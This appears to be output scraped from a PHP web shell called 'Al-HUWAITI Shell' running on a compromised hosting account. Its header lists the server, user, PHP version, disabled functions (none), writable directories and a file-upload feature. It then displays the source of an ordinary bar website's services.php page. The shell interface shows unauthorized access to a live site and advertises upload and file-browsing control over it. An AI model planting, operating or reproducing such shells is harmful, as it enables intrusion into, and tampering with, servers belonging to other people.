Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/bond-lounge.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/bond-lounge.com/public_html/services.php
<?php session_start();
$page_name = basename($_SERVER['PHP_SELF']);
$page_title = "Services";
$page_header = "services_header.jpg";
include("header.php"); ?>
<title><?php echo $company_name; ?> - <?php echo $page_title; ?></title>
<?php include("page_header.php"); ?>
<br><br>

        <!--Services One Start-->
        <section class="services-one">
            <div class="services-one__top">
                <div class="container">
                    <div class="row">
                        <div class="col-xl-5 col-lg-6">
                            <div class="services-one__top-left">
                                <div class="section-title text-left">
                                    <div class="section-sub-title-box">
                                        <p class="section-sub-title">Our services</p>
                                        <div class="section-title-shape-1">
                                            <img src="assets/images/shapes/section-title-shape-1.png" alt="">
                                        </div>
                                        <div class="section-title-shape-2">
                                            <img src="assets/images/shapes/section-title-shape-2.png" alt="">
                                        </div>
                                    </div>
                                    <h2 class="section-title__title">Not Just a Drink — An Experience</h2>
                                </div>
                            </div>
                        </div>
                        <div class="col-xl-7 col-lg-6">
                            <div class="services-one__top-right">
                                <p class="services-one__top-text">Whether you're here for a quiet evening or a night of celebration, we offer a curated experience that blends style, sophistication, and unforgettable service. We don’t just serve drinks — we serve moments.</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="services-one__bottom">
                <div class="services-one__container">
                    <div class="row">
<?php
	$stmt_ser = $con -> prepare("SELECT unique_id,title,preamble,picture1 FROM services"); 
	$stmt_ser -> execute(); 
	$stmt_ser -> store_result(); 
	$stmt_ser -> bind_result($ser_id,$service_head,$service_preamble,$picture); 
	$numrows_ser = $stmt_ser -> num_rows();
	if($numrows_ser > 0){
		while ($stmt_ser -> fetch()) { 
            
?>
                        <!--Services One Single Start-->
                        <div class="col-xl-3 col-lg-4 col-md-6 wow fadeInUp" data-wow-delay="100ms">
                            <div class="services-one__single">
                                <div class="service-one__img">
                                    <img src="site_img/<?php echo "services" ?>/<?php echo $picture ?>" style='height:250px; object-fit:cover;'>
                                </div>
                                <div class="service-one__content">
                                    <div class="services-one__icon">
                                        <i style='color:white;' class='fa fa-star'></i>
                                    </div>
                                    <h2 class="service-one__title"><a href="details?u=<?php echo $ser_id; ?>&title=<?php echo "services"; ?>"><?php echo $service_head; ?></a></h2>
                                    <p class="service-one__text"><?php echo $service_preamble; ?></p>
                                </div>
                            </div>
                        </div>
                        <!--Services One Single End-->
<?php } } ?>

                    </div>
                </div>
            </div>
        </section>
        <!--Services One End-->
<?php include("footer.php"); ?>

Al-HUWAITI Shell